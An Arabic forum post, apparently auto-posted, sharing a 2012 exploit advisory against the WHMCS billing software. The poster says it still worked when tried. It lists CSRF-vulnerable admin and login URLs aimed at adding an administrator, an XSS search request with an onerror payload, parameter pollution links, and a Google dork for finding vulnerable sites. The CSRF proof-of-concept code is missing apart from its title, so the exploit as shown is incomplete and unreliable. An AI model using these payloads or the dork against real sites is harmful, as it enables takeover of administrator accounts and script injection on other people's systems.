حالة الموضوع:
مغلق
  1. .:: RSS ::.

    .:: RSS ::. عضوية آلية

    الأنتساب:
    ‏9 سبتمبر 2011
    المشاركات:
    14,005
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    36
    الإقامة:
    IQ-T34M
    السلام عليكم ورحمة الله وبركاته


    الثغره قديمه قليلا لكن جربتها الان اشتغلت معي

    حبيت اضعها لكم

    كود:
    ##########################################################################################################################
    # Title: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability
    # Version: Latest version 5.1 and other previous version maybe vulnerable
    # Vendor: WHMCS - The Complete Client Management, Billing Support Solution
    # Date: 2012-05-30
    # Tested on: win/linux
    # Author/Found by: Shadman Tanjim
    # Email: [email protected]
    # Greetz: Sayem Islam, Shahee Mirza, JingoBD, ManInDark, Rohit And All Crew and Members of Bangladesh Cyber Army.
    # Special Thanks: x8631p
    # Google Dork: "Powered by WHMCompleteSolution" or inurl:WHMCS
    ############################################################################################################################

    CSRF Vulnerability:

    Get:
    http://site.com/clientarea.php
    http://site.com/admin/index.php
    http://site.com/admin/login.php

    Post:
    http://site.com/admin/login.php
    http://site.com/cart.php
    http://site.com/admin/configadmins.php
    http://site.com/pwreset.php


    p0c:




    WHMCS CSRF ExpL0iT PoC










    Cross-site Scripting (XSS) Vulnerability:

    request:pOST http://site.com/knowledgebase.php?action=search HTTP/1.1
    Content-Type: application/x-www-form-urlencoded

    search='%20onerror%3D'f(PSRyh)


    HTTP Parameter Pollution :

    1.Affected link: http://site.com/cart.php?a=add&domain=transfer&n913620=v992636
    Affected parameter: a=add

    2. Affected link: http://site.com/domainchecker.php?search=bulkregister&n946774=v992350
    Affected parameter: search=bulkregister

    3. Affected link: http://site.com/cart.php?currency=2&gid=1&n972751=v976696
    Affected parameter: currency=2
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة